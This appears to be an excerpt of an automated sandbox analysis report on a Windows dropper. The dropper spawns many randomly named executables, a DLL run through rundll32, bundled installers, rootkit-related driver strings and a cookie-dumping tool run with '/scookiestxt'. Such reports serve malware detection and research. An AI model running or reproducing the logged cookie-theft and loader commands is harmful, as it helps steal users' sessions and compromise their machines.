      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Process created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe Process created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe Process created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe Process created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Process created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe Process created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe Process created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe Process created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe Process created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe Process created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe Process created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe Process created: unknown unknown
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe Process created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe Process created: unknown unknown
      Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File written: C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Automated click: Next
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File opened: C:\Windows\SysWOW64\msftedit.DLL
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Window detected: Number of UI elements: 28
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Window detected: Number of UI elements: 28
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: yevbZfdCqR.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: yevbZfdCqR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: M5uLwz0sXvZcR89u_43Nm9v8.exe, 0000000E.00000003.701416962.00000000027B3000.00000004.00000001.sdmp
      Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: _.pdb source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: symsrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: UnpackChrome.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: vcruntime140.i386.pdbGCTL source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdb source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: symsrv.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: EfiGuardDxe.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Loader.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: JC:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\sawofasiduboh_85-yehasona\dib.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000000.659045843.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdbn[ source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb, source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: C:\timomamuf\25_t.pdb source: yevbZfdCqR.exe, 00000001.00000003.648989644.0000000005AEF000.00000004.00000001.sdmp, 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000000.656280394.0000000000446000.00000002.00020000.sdmp
      Source: Binary string: \13\TestExeBin\zNoteDebug.pdb source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp
      Source: Binary string: vcruntime140.i386.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: jfiag3g_gg.exe, 00000021.00000002.969839258.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000024.00000002.970581180.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000029.00000002.989528470.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: ^C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: 9.C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Unable to locate the .pdb file in this location source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\pohihusuwunegu\gutuna\vepazipal\bowahifevumu_wosojus yavo.pdb source: yevbZfdCqR.exe, 00000001.00000003.645691149.0000000005C3D000.00000004.00000001.sdmp, MQ5u6_H0cs9EUXsesfNpGUNc.exe, 00000007.00000000.657444831.0000000000434000.00000002.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: The module signature does not match with .pdb signature. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: .pdb.dbg source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: '(EfiGuardDxe.pdbx source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: or you do not have access permission to the .pdb location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\ChromeCookiesView\Release\ChromeCookiesView.pdb source: jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: yevbZfdCqR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: yevbZfdCqR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: yevbZfdCqR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: yevbZfdCqR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: yevbZfdCqR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation:

      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Unpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Unpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe Unpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe Unpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
